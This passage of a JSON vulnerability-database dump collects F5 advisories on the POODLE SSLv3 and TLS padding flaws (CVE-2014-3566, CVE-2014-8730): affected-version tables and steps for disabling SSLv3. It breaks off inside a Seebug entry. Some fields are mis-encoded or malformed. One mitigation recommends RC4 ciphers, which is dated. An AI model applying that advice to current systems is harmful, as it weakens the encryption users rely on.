"le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.4.0", "operator": "le"}, {"name": "LineRate", "version": "2.4.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "LineRate", "version": "2.2.6", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.4.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.4.1 HF6", "operator": "le"}], "cvelist": ["CVE-2014-3567"], "modified": "2015-11-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15723.html", "id": "SOL15723", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-18T23:48:31", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned ID 481907, ID 484678, ID 484677 (BIG-IP, BIG-IQ, Enterprise Manager), ID 484393 (ARX), ID 484708 (FirePass), and LRS-31601 (LineRate) to this vulnerability, and is currently evaluating the vulnerability status for supported releases. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H484499 on the **Diagnostics** &gt; **Identified** &gt; **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\n**Important**: Some releases in the following table have multiple component entries with different vulnerable and non-vulnerable version information.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP AAM | 11.4.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.4.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP AFM | 11.3.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.3.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP Analytics | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP APM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP ASM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP DNS | None | 12.0.0 | None \n \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nBIG-IP GTM | 11.0.0 - 11.6.1 | None | Configuration utility \n \nBIG-IP Link Controller | 11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n | | | \nBIG-IP PEM | 11.3.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.3.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP PSM | 11.0.0 - 11.4.1 | None | SSL profiles \nConfiguration utility \n \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nBIG-IP WOM | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nARX | 6.0.0 - 6.4.0 | None | ARX Manager GUI \nAPI (disabled by default) \n \nEnterprise Manager | 3.0.0 - 3.1.1 \n2.0.0 - 2.3.0 | None | Configuration utility \n \nFirePass | 7.0.0 \n6.0.0 - 6.1.0 | None | Administrative interface \nWebServices \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Configuration utility \n4.0.0 - 4.5.0 | None | REST API \n \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Configuration utility \n4.2.0 - 4.5.0 | None | REST API \n \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Configuration utility \n4.0.0 - 4.5.0 | None | REST API \n \nBIG-IQ ADC | 4.5.0 | None | Configuration utility \n4.5.0 | None | REST API \n \nBIG-IQ Centralized Management | None | 5.0.0 \n4.6.0 | None \n \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | None \n \nF5 iWorkflow | None | 2.0.0 | None \n \nLineRate | 2.2.0 - 2.4.1 \n1.6.0 - 1.6.4 | None | SSL profiles \n \n* SSL profiles that contain the default cipher string (DEFAULT) do not allow SSLv3 connections and are not vulnerable to this CVE. However, if you have modified the **Ciphers** setting for the profile to allow SSLv3, then connections to the virtual server are vulnerable. For information about verifying whether SSLv3 is enabled for the profile, refer to the **Vulnerability Recommended Actions** section.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [BIG-IP, BIG-IQ, and Enterprise Manager](<https://support.f5.com/csp/article/K15702#bigip>)\n * [FirePass](<https://support.f5.com/csp/article/K15702#firepass>)\n * [ARX](<https://support.f5.com/csp/article/K15702#arx>)\n * [LineRate](<https://support.f5.com/csp/article/K15702#linerate>)\n\n**BIG-IP, BIG-IQ, and Enterprise Manager**\n\nSSL profiles\n\nTo mitigate this vulnerability in the SSL profile for the BIG-IP system, you can disable the SSLv3 protocol in the SSL profile by adding **!SSLv3** to the cipher string. For details about how to add this, refer to the following articles:\n\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)](<https://support.f5.com/csp/article/K7815>)\n\nConfiguration utility\n\nTo mitigate this vulnerability for the Configuration utility, use the following options:\n\nBIG-IP 11.5.0 - 11.6.1\n\nFor BIG-IP 11.5.0 through 11.6.1, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Disable SSLv3 (and SSLv2) by typing the following command: \n\nmodify /sys httpd ssl-protocol \"all -SSLv2 -SSLv3\"\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\nAll BIG-IP versions\n\nFor all BIG-IP versions, F5 recommends that you expose the management access only on trusted networks.\n\nBIG-IQ 4.4.0 and later\n\nFor BIG-IQ 4.4.0 and later, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Impact of procedure**: This procedure restarts the **webd** process and temporarily disrupts traffic to the BIG-IQ system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the BIG-IQ command line.\n 2. Back up a copy of the **/etc/webd/webd.conf** file by typing the following command: \n\ncp -p /etc/webd/webd.conf /var/tmp/webd.conf.sol15702\n\n 3. Edit the **/etc/webd/webd.conf** file using a text editor of your choice.\n 4. Locate the following line in the **/etc/webd/webd.conf** file: \n\nssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n\n 5. Remove SSLv2 and SSLv3 from this line. After removal, this line should appear as follows: \n\nssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\n 6. Save the changes and exit the text editor.\n 7. Restart the **webd** process by typing the following command: \n\ntmsh restart sys service webd\n\n**FirePass**\n\n**Disabling SSLv3 for all FirePass interfaces**\n\n**Impact of procedure**: This procedure restarts services and prevents some connections to the FirePass system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the FirePass Administrator interface.\n 2. Navigate to **Device Management** &gt;** Security** &gt; **User Access Security**.\n 3. Under **SSL Protocol Versions**, click **Accept only TLS protocol** **(incompatible with some browsers)**.\n 4. Under **SSL Ciphers Policy Enforcement**, select the **Reject SSL connection when a non-compliant cipher is used by the client browser **check box.\n 5. To restart services, click \"**click *here* to restart FirePass Services**.\"\n 6. Click **Restart**.\n\n**ARX**\n\nChanging the ARX Manager GUI cipher string (6.2.0 and later)\n\nTo disable SSLv3 for the ARX Manager GUI, perform the following procedure:\n\n**Impact of procedure:** Disabling SSLv3 may prevent some connections to the ARX Manager GUI.\n\n 1. Log in to the ARX Manager GUI.\n 2. Expand **Maintenance**.\n 3. Select **Certificates**.\n 4. Click the tab for **SSL Ciphers**.\n 5. Deselect all SSL ciphers.\n\n**LineRate**\n\nTo mitigate this vulnerability in the SSL profile for the LineRate system, you can disable the SSLv3 protocol in the SSL profile by pre-pending **!SSLv3** to the cipher-list. For details about how to add this, refer to the following article:\n\n * [CVE-2014-3566: Removing SSLv3 from LineRate](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-linerate>)\n\n**Note**: A DevCentral login is required to access this content.\n\n * [K15882: TLS1.x padding vulnerability CVE-2014-8730](<https://support.f5.com/csp/article/K15882>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n**Note**: A DevCentral login is required to access the following content.\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)\n * [CVE-2014-3566: Removing SSLv3 from BIG-IP](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip>)\n * [iRule to stop SSLv3 connections](<https://devcentral.f5.com/articles/irule-to-stop-sslv3-connections>)\n * [POODLE and TLS_FALLBACK_SCSV deep dive](<https://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive>)\n * [SSLv3 POODLE mitigation recommendations](<https://devcentral.f5.com/articles/sslv3-poodle-recommendations>)\n", "reporter": "f5", "published": "2014-10-15T05:15:00", "title": "SSLv3 vulnerability CVE-2014-3566", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2017-09-18T21:31:00", "href": "https://support.f5.com/csp/article/K15702", "id": "F5:K15702", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-03T05:27:54", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.comhttps://devcentral.f5.com/articles/sslv3-poodle-recommendations", "https://support.f5.comhttps://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive", "https://support.f5.comhttps://devcentral.f5.com/articles/irule-to-stop-sslv3-connections", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip", "https://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * BIG-IP, BIG-IQ, and Enterprise Manager\n * FirePass\n * ARX\n * LineRate\n\n**BIG-IP, BIG-IQ, and Enterprise Manager**\n\nSSL profiles\n\nTo mitigate this vulnerability in the SSL profile for the BIG-IP system, you can\u00c2 disable the SSLv3 protocol in the SSL profile by adding **!SSLv3** to the cipher string. For details about how to add this, refer to the following articles:\n\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n\nConfiguration utility\n\nTo mitigate this vulnerability for the Configuration utility use the following options:\n\nBIG-IP 11.5.0 \u00e2\u0080\u0093 11.6.0\n\nFor BIG-IP 11.5.0 \u00e2\u0080\u0093 11.6.0, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n 1. Log in to the\u00c2 Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Disable SSLv3 (and SSLv2) by typing the following command: \n\nmodify /sys httpd ssl-protocol \"all -SSLv2 -SSLv3\"\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\nAll BIG-IP versions\n\nFor all BIG-IP versions, F5 recommends that you expose the management access only on trusted networks.\n\nBIG-IQ 4.4.0 and later\n\nFor BIG-IQ 4.4.0 and later, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Impact of procedure**: This procedure will restart the **webd** process and temporarily disrupt traffic to the BIG-IQ system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the BIG-IQ command line.\n 2. Back up a copy of the **/etc/webd/webd.conf** file by typing the following command: \n\ncp -p /etc/webd/webd.conf /var/tmp/webd.conf.sol15702\n\n 3. Edit the **/etc/webd/webd.conf** file using a text editor of your choice.\n 4. Locate the following line in the **/etc/webd/webd.conf** file: \n\nssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n\n 5. Remove SSLv2 and SSLv3 from this line. After removal, this line should appear as follows: \n\nssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\n 6. Save the changes and exit the text editor.\n 7. Restart the **webd** process by typing the following command: \n\ntmsh restart sys service webd\n\n**FirePass**\n\n**Disabling SSLv3 for all FirePass interfaces**\n\n**Impact of procedure**: This procedure will restart services and prevent some connections to the FirePass system.\u00c2 You should perform this procedure during a maintenance window.\n\n 1. Log in to the FirePass Administrator interface.\n 2. Navigate to **Device Management** &gt;** Security** &gt; **User Access Security**.\n 3. Under\u00c2 **SSL Protocol Versions** click **Accept only TLS protocol** **(incompatible with some browsers)**.\n 4. Under **SSL Ciphers Policy Enforcement**, select the **Reject SSL connection when a non-compliant cipher is used by the client browser **check box.\n 5. To restart services, click \"**click *here* to restart FirePass Services**.\"\n 6. Click **Restart**.\n\n**ARX**\n\n**Changing the ARX Manager GUI cipher string (6.2.0 and later)**\n\nTo disable SSLv3 for the ARX Manager GUI, perform the following procedure:\n\n**Impact of procedure:** Disabling SSLv3 may prevent some connections to the ARX Manager GUI.\n\n 1. Log in to the ARX Manager GUI.\n 2. Expand **Maintenance**.\n 3. Select **Certificates**.\n 4. Click the tab for **SSL Ciphers**.\n 5. Deselect all SSL ciphers.\n\n**LineRate**\n\nTo mitigate this vulnerability in the SSL profile for the LineRate system, you can disable the SSLv3 protocol in the SSL profile by pre-pending **!SSLv3** to the cipher-list. For details about how to add this, refer to the following article:\n\n * [CVE-2014-3566: Removing SSLv3 from LineRate](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-linerate>)\n\n**Note**: A DevCentral login is required to access this content.\n\nSupplemental Information\n\n * SOL15882: TLS1.x padding vulnerability CVE-2014-8730\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n**Note**: A DevCentral login is required to access the following content.\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)\n * [CVE-2014-3566: Removing SSLv3 from BIG-IP](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip>)\n * [iRule to stop SSLv3 connections](<https://devcentral.f5.com/articles/irule-to-stop-sslv3-connections>)\n * [POODLE and TLS_FALLBACK_SCSV deep dive](<https://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive>)\n * [SSLv3 POODLE mitigation recommendations](<https://devcentral.f5.com/articles/sslv3-poodle-recommendations>)\n", "reporter": "f5", "published": "2014-10-14T00:00:00", "title": "SOL15702 - SSLv3 vulnerability CVE-2014-3566", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.0.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.0.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "11.3.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "11.3.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.4.1", "operator": "le"}, {"name": "11.0.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "\u00c2\u00a0", "version": "\u00c2", "operator": "le"}, {"name": "11.4.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "FirePass", "version": "7.0.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.1.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4\u00c2", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.4.1", "operator": "le"}, {"name": "LineRate", "version": "2.4.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "LineRate", "version": "1.6.4", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ ADC", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.4.1", "operator": "le"}], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2016-07-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15702.html", "id": "SOL15702", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-03T05:27:45", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/7000/800/sol7815.html", "https://support.f5.com/kb/en-us/solutions/public/15000/700/sol15702.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13171.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "2 If you are planning to upgrade to BIG-IP APM 11.4.1 HF6 or 11.5.1 HF6 to mitigate this issue, you should instead upgrade to 11.4.1 HF7 or 11.5.1 HF7 to avoid an issue specific to BIG-IP APM.\u00c2 For more information, refer to SOL15914:\u00c2 The TMM process may restart and produce a core file after BIG-IP APM systems are upgraded.\u00c2 \u00c2 \u00c2 \n\n**Note**: Testing tools for SSL/TLS may report false positives for BIG-IP 10.2.4 HF10 and 11.2.1 HF13 due to an issue being tracked in ID 500688. While these versions have been patched and contain the code fix for CVE-2014-8730, certain test tools may still report a false positive. This reason for this is because the BIG-IP system silently terminates the connection instead of responding with a **bad_record_mac** alert. Therefore, certain test tools erroneously report a false positive because the connection times out and the tools do not receive a **bad_record_mac** alert.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can configure a custom cipher string for the SSL profile and associate the profile with the virtual servers. To do so, perform one of the following procedures:\n\n**BIG-IP SSL profiles**\n\nTo mitigate this vulnerability, you can create a custom cipher string for the SSL profile that uses RC4 or AES-GCM ciphers. For details about how to add this, refer to the following procedures:\n\nBIG-IP 11.5.0 and later \n\n\nIn BIG-IP 11.5.0 and later, you can create a custom cipher string for the SSL profile using the AES-GCM:RC4-SHA ciphers. To do so, perform the following procedure: \n\n\n**Impact of procedure:** Clients that do not support the AES-GCM or RC4-SHA ciphers will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the Traffic Management Shell (**tmsh**)** **by typing the following command:\n\ntmsh\n\n 2. Create a custom SSL profile that specifies the AES-GCM:RC4-SHA ciphers by using the following syntax:\n\ncreate /ltm profile &lt;client-ssl / server-ssl&gt; &lt;profile_name&gt; ciphers !SSLv3:AES-GCM:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile called TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:AES-GCM:RC4-SHA\n\n 3. Save the configuration by typing the following command:\n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\nBIG-IP 10.x - 11.4.1 \n\n\nIn BIG-IP 10.x - 11.4.1, you can create a custom cipher string for the SSL profile using the RC4-SHA ciphers. To do so, perform the following procedure: \n\n\n**Impact of procedure:** Clients that do not support the RC4-SHA cipher will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the Traffic Management Shell (**tmsh**)** **by typing the following command: \n\n\ntmsh\n\n 2. Create a custom SSL profile that specifies the RC4-SHA ciphers by using the following syntax:\n\ncreate /ltm profile &lt;client-ssl / server-ssl&gt; &lt;profile_name&gt; ciphers !SSLv3:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile called TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:RC4-SHA\n\n 3. Save the configuration by typing the following command:\n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\nSupplemental Information\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)** \n \nNote**: A DevCentral login is required to access this content.\n * SOL15702: SSLv3 vulnerability CVE-2014-3566 \n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n", "reporter": "f5", "published": "2014-12-08T00:00:00", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SOL15882 - TLS1.x padding vulnerability CVE-2014-8730", "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.1", "operator": "le"}], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2016-06-28T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html", "id": "SOL15882", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "# SSL 3.0 POODLE attack information disclosure Vulnerability(CVE-2014-3566)\n\n * Release date: 2014-10-14\n * Update date: 2014-10-16\n\n### Affected system:\n\n * Netscape ssl 3.0\n * Netscape tls\n\n### Not affected system:\n\n * Netscape tls 1.2\n * Netscape tls 1.1\n * Netscape tls 1.0\n\n## Description:\n\nCVE(CAN) ID: CVE-2014-3566\n\nSSL3. 0 is an obsolete and insecure Protocol, has now been TLS 1.0, TLS 1.1, TLS 1.2 alternative, because of compatibility reasons, most TLS implementations remain compatible with SSL3. To 0.\n\nFor commonality considerations, currently most browsers version support SSL3. 0, TLS Protocol handshake phase contains a version negotiation step, in General, the client and server to the latest version of the Protocol will be used. Its in the server side of the handshake phase for version negotiation, first offer its support agreement to the latest version, if the handshake fails, 